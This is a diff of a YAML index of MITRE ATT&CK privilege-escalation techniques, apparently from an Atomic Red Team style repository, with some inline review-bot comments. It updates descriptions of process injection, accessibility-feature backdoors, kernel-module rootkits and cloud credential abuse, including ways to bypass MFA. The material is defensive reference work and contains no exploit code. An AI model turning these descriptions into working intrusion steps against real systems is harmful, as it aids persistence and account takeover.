@@ -19264,12 +19572,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19346,7 +19652,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19385,7 +19690,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19434,8 +19739,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19467,7 +19770,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19515,13 +19818,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19534,16 +19835,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19555,16 +19856,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -19619,7 +19920,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19642,7 +19942,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19686,8 +19986,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19764,7 +20062,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19792,8 +20090,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19852,23 +20148,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19878,11 +20173,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -19893,12 +20192,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
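Review bot: x_mitre_attack_spec_version: 3.2.0 is inserted here directly after kill_chain_phases, while the hunk at -19979 removes the same key (and x_mitre_modified_by_ref) from the bottom of the object; the value is unchanged, so this is pure key-order churn. Having the generator sort or fix the key order would keep these diffs limited to real content changes such as the app-password paragraph added above.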
@@ -19907,6 +20213,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
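Review bot: the x_mitre_detection text at the end of this hunk is unchanged and still covers only Service Principal/Application modifications and SSH key APIs, so the CreateLoginProfile and Entra ID app-password cases newly added to the description have no matching detection guidance. Since this file mirrors upstream ATT&CK, the fix belongs upstream, but the gap is worth tracking before atomic tests are written for T1098.001 (atomic_tests is still empty).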
@@ -19915,13 +20222,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -19947,10 +20257,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -19959,10 +20277,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19979,9 +20307,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
@@ -20045,7 +20370,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -20134,7 +20458,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -20192,7 +20515,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -20217,12 +20540,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20248,7 +20570,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20262,7 +20583,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20289,8 +20609,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -20301,7 +20621,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
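Review bot: for T1546.001 the spec-version keys move the opposite way to T1098.001: x_mitre_attack_spec_version and x_mitre_modified_by_ref are removed from the middle of the object (hunks at -20248 and -20262) and re-added at the bottom here, with the value bumped from 2.1.0 to 3.2.0. The bump is the only substantive change; the relocation again argues for a stable key order in the generator so reviewers can see content changes at a glance.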
@@ -20372,7 +20693,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20399,7 +20720,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20439,7 +20759,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20459,12 +20779,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20518,11 +20837,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20609,9 +20927,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20624,12 +20942,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20665,16 +20982,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -20715,143 +21031,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
